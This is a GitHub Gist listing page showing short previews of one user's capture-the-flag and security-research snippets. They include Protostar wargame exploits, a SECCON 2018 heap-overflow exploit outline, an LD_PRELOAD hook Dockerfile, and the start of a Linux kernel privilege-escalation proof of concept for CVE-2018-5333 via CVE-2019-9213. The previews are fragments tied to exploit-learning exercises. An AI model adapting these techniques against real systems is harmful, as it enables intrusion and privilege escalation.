William Bowling wbowling
wbowling
/ 0_reuse_code.js
Last active Apr 20, 2021
Here are some things you can do with Gists in GistBox.
View 0_reuse_code.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Use Gists to store code you would like to remember later on | |
| console.log(window); // log the "window" object to the console |
wbowling
/ stack0_wrapper.sh
Created Jul 16, 2017
View stack0_wrapper.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| ulimit -c 0 | |
| export LIBC_FATAL_STDERR_=1 | |
| python -c 'print "\xcc\x84\x04\x08"*16 + "\x00\x03\x02\x01" + "DDDD"' > input.bin | |
| output="" | |
| COUNTER=0 | |
| while [[ ! $output =~ "modified" ]]; do | |
| MOD=$(( $COUNTER % 1000 )) |
wbowling
/ mission009.c
Created Jul 20, 2017
View mission009.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| int main() { | |
| // char *pass = "THE SECRET HAS BEEN REMOVED LOL"; | |
| char *pass = "\x9a\x60\x76\x14\x8b\x36\x5a\x10\x2b\x91\xc4\x6c\xab\x27\x92\x99\xf8\x6a\xec\x5d\x32\x20\x3d\x61\x8f\xc7\xfb\xdd\x02\x72\xbf"; | |
| char key[31]; | |
| char out[31]; | |
| // 2017-07-16 to 2017-07-20 |
wbowling
/ mission009.py
Created Jul 21, 2017
View mission009.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import string | |
| def srand(s): | |
| global seed | |
| seed = s | |
| # microsoft c runtime implementation | |
| def rand(): | |
| global seed |
wbowling
/ format0.py
Created Nov 18, 2017
https://exploit-exercises.com/protostar/format0/ with modern gcc and aslr https://asciinema.org/a/148133
View format0.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| """ | |
| Overwrite the GOT entry for __stack_chk_fail with 0x40061a so we jump there instead. | |
| The address can be passed in via argv, we cant use nulls but we can use blank strings instead. | |
| As the argv location is semi random, it takes around 500 iterations which is pretty reasonable for 64bit | |
| """ |
View rand.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| def srand(s): | |
| global seed | |
| seed = s | |
| # microsoft c runtime implementation | |
| def rand(): | |
| global seed | |
| seed = (seed * 214013 + 2531011) % 2**64 |
wbowling
/ internet_of_seat.py
Last active Nov 2, 2018
SECCON 2018 internet_of_seat - https://score-quals.seccon.jp/challenges#internet_of_seat
View internet_of_seat.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| # pylint: skip-file | |
| """ | |
| When performing a chunked transfer, realloc doesnt take into account the size of the headers allowing an overflow. | |
| As the initial heap (0x100) is located inline we can overwrite the current heap location. | |
| * overwrite __malloc_heap to point to our fake heap | |
| * our fake heap size is huge so that memory os returned near the GOT | |
| * overwrite memchr got with shellcode address | |
| * win |
View Dockerfile
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| FROM ubuntu | |
| RUN apt-get update -y && apt-get install -y gcc | |
| RUN ( \ | |
| echo '#define _GNU_SOURCE'; \ | |
| echo '#include <fcntl.h>'; \ | |
| echo '#include <stdio.h>'; \ | |
| echo '#include <unistd.h>'; \ | |
| \ | |
| echo 'char *getenv(const char *__name) {'; \ |
wbowling
/ cve-2018-5333-poc.c
Created Mar 9, 2019
Example of using CVE-2019-9213 to make previous kernel bugs exploitable
View cve-2018-5333-poc.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // 4.4.0-116-generic #140-Ubuntu SMP | |
| #define _GNU_SOURCE | |
| #include <err.h> | |
| #include <fcntl.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <sys/mman.h> | |
| #include <unistd.h> | |
| #include <stdio.h> |
View babyjs.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| let oob_arr = [1.1, 0x61616161, 3.3]; | |
| function getSetValue(i, v) { | |
| if (v) { | |
| oob_arr[i] = v; | |
| } else { | |
| return oob_arr[i]; | |
| } | |
| } |
OlderNewer